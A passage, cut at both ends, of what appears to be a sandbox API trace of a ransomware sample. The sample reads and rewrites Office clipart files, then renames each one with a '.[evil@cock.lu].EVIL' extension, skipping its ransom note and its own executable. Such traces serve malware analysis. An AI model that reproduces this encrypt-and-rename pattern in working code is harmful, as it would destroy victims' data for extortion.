lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8118, lpOverlapped=0x0) returned 1 [0167.093] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.093] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.093] _errno () returned 0x84b1160840 [0167.093] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.093] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x8120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8120, lpOverlapped=0x0) returned 1 [0167.094] CloseHandle (hObject=0x1a8) returned 1 [0167.094] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.094] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.094] __uncaught_exception () returned 0x84b1160800 [0167.094] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.094] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02738u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02738u.bmp.[evil@cock.lu].evil")) returned 1 [0167.095] ??_V@YAXPEAX@Z () returned 0x1 [0167.098] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP", dwFileAttributes=0x200) returned 0 [0167.098] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.098] wcsstr (_Str="PH02740G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.098] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF") returned 69 [0167.098] wcscmp (_String1="PH02740G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.098] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02740G.GIF") returned 0x0 [0167.098] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF") returned 0x45 [0167.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.100] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5f2b, lpOverlapped=0x0) returned 1 [0167.103] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.103] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.103] _errno () returned 0x84b1160840 [0167.103] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.103] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x5f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5f40, lpOverlapped=0x0) returned 1 [0167.103] CloseHandle (hObject=0x1a8) returned 1 [0167.103] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.103] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.103] __uncaught_exception () returned 0x84b1160800 [0167.103] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.104] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740g.gif.[evil@cock.lu].evil")) returned 1 [0167.105] ??_V@YAXPEAX@Z () returned 0x1 [0167.108] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF", dwFileAttributes=0x200) returned 0 [0167.108] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.108] wcsstr (_Str="PH02740U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.108] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP") returned 69 [0167.108] wcscmp (_String1="PH02740U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.108] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02740U.BMP") returned 0x0 [0167.108] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP") returned 0x45 [0167.108] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.110] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7f68, lpOverlapped=0x0) returned 1 [0167.112] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.113] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.113] _errno () returned 0x84b1160840 [0167.113] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.113] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x7f80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7f80, lpOverlapped=0x0) returned 1 [0167.113] CloseHandle (hObject=0x1a8) returned 1 [0167.113] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.113] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.113] __uncaught_exception () returned 0x84b1160800 [0167.113] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.113] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740u.bmp.[evil@cock.lu].evil")) returned 1 [0167.114] ??_V@YAXPEAX@Z () returned 0x1 [0167.117] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP", dwFileAttributes=0x200) returned 0 [0167.117] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.117] wcsstr (_Str="PH02742G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.117] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF") returned 69 [0167.117] wcscmp (_String1="PH02742G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.117] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02742G.GIF") returned 0x0 [0167.117] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF") returned 0x45 [0167.117] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.119] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x50a5, lpOverlapped=0x0) returned 1 [0167.122] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.122] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.122] _errno () returned 0x84b1160840 [0167.122] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.122] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x50c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x50c0, lpOverlapped=0x0) returned 1 [0167.122] CloseHandle (hObject=0x1a8) returned 1 [0167.122] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.122] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.122] __uncaught_exception () returned 0x84b1160800 [0167.122] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.122] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742g.gif.[evil@cock.lu].evil")) returned 1 [0167.123] ??_V@YAXPEAX@Z () returned 0x1 [0167.126] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF", dwFileAttributes=0x200) returned 0 [0167.126] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.126] wcsstr (_Str="PH02742U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.126] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP") returned 69 [0167.126] wcscmp (_String1="PH02742U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.126] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02742U.BMP") returned 0x0 [0167.126] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP") returned 0x45 [0167.126] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.128] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0167.131] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.131] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.131] _errno () returned 0x84b1160840 [0167.131] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.131] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0167.131] CloseHandle (hObject=0x1a8) returned 1 [0167.131] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.131] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.131] __uncaught_exception () returned 0x84b1160800 [0167.131] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.132] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742u.bmp.[evil@cock.lu].evil")) returned 1 [0167.132] ??_V@YAXPEAX@Z () returned 0x1 [0167.135] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP", dwFileAttributes=0x200) returned 0 [0167.135] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.135] wcsstr (_Str="PH02743G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.135] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 69 [0167.135] wcscmp (_String1="PH02743G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.135] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02743G.GIF") returned 0x0 [0167.135] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 0x45 [0167.135] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02743g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.137] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6d86, lpOverlapped=0x0) returned 1 [0167.140] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.140] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.140] _errno () returned 0x84b1160840 [0167.140] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.140] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x6da0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6da0, lpOverlapped=0x0) returned 1 [0167.140] CloseHandle (hObject=0x1a8) returned 1 [0167.140] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.140] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.140] __uncaught_exception () returned 0x84b1160800 [0167.140] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.141] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02743g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02743g.gif.[evil@cock.lu].evil")) returned 1 [0167.142] ??_V@YAXPEAX@Z () returned 0x1 [0167.145] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF", dwFileAttributes=0x200) returned 0 [0167.145] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.145] wcsstr (_Str="PH02746G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.145] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 69 [0167.145] wcscmp (_String1="PH02746G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.145] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02746G.GIF") returned 0x0 [0167.145] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 0x45 [0167.145] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.150] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5e7b, lpOverlapped=0x0) returned 1 [0167.164] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.164] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.164] _errno () returned 0x84b1160840 [0167.164] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.164] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x5e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5e80, lpOverlapped=0x0) returned 1 [0167.164] CloseHandle (hObject=0x1a8) returned 1 [0167.164] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.164] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.165] __uncaught_exception () returned 0x84b1160800 [0167.165] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.165] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif.[evil@cock.lu].evil")) returned 1 [0167.166] ??_V@YAXPEAX@Z () returned 0x1 [0167.168] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF", dwFileAttributes=0x200) returned 0 [0167.169] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.169] wcsstr (_Str="PH02746U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.169] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 69 [0167.169] wcscmp (_String1="PH02746U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.169] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02746U.BMP") returned 0x0 [0167.169] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 0x45 [0167.169] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.171] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7d84, lpOverlapped=0x0) returned 1 [0167.173] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.173] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.173] _errno () returned 0x84b1160840 [0167.174] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.174] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x7da0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7da0, lpOverlapped=0x0) returned 1 [0167.174] CloseHandle (hObject=0x1a8) returned 1 [0167.174] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.174] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.174] __uncaught_exception () returned 0x84b1160800 [0167.174] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.174] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp.[evil@cock.lu].evil")) returned 1 [0167.175] ??_V@YAXPEAX@Z () returned 0x1 [0167.178] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP", dwFileAttributes=0x200) returned 0 [0167.178] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.179] wcsstr (_Str="PH02748G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.179] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 69 [0167.179] wcscmp (_String1="PH02748G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.179] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02748G.GIF") returned 0x0 [0167.179] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 0x45 [0167.179] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.180] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6090, lpOverlapped=0x0) returned 1 [0167.196] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.196] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.196] _errno () returned 0x84b1160840 [0167.196] 